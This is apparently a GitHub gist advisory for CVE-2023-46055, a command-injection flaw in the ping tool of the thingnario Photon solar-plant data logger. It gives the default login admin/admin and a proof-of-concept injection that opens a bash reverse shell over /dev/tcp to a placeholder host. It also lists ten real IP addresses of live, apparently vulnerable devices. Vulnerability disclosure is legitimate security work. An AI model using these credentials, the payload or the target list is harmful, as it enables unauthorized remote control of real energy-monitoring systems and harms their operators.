[CVE ID]
CVE-2023-46055
[PRODUCT]
thingnario-photon
[VERSION]
1.0
[VULN TYPE]
Remote Command Execute
[DESCRIPTION]
https://www.thingnario.com/
Thingnairo PV Monitoring Solution means that the Photon product collects data and alerts from solar power plants and immediately sends the data to a display platform via an API, so users can receive instant production data and information without delay, which is sold in Taiwan and Southeast Asia.
The vulnerability is generated by the data collector (logger) in the product. Below is a description of the data aggregator from the official website, in which the default password is exposed.
https://thingnario-service.zendesk.com/hc/zh-tw/articles/13402230828185-%E5%A6%82%E4%BD%95%E5%B0%87%E8%B3%87%E6%96%99%E8%92%90%E9%9B%86%E5%99%A8%E8%A8%AD%E5%AE%9A%E7%82%BA%E5%9B%BA%E5%AE%9AIP-
This vulnerability allows an attacker to enter the backend using the commonly known weak password admin/admin on the "thingnario Logger Maintenance Webpage" page that can be collected in the fofa/shodan.
The ping function in the backend application does not properly validate, filter or escape user-supplied input data, but instead passes it directly to the underlying system command execution commands. An attacker could use this ping function to inject malicious commands.
poc:click "Network Setting"--->"ping tool" and input "127.0.0.1|" or "127.0.0.1 &&" follows the command you want to execute(for example:127.0.0.1|bash -i >& /dev/tcp/IP/port 0>&1)
living_example_url:
http://106.105.138.247
http://61.216.165.68
http://60.248.238.201
http://60.249.195.163
http://61.221.229.121
http://210.61.177.216
http://210.61.177.215
http://59.125.208.240
http://211.75.227.175
http://211.72.95.251
-
-
Save GroundCTL2MajorTom/eef0d55f5df77cc911d84392acdbf625 to your computer and use it in GitHub Desktop.
advisory_thingnario_photon
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment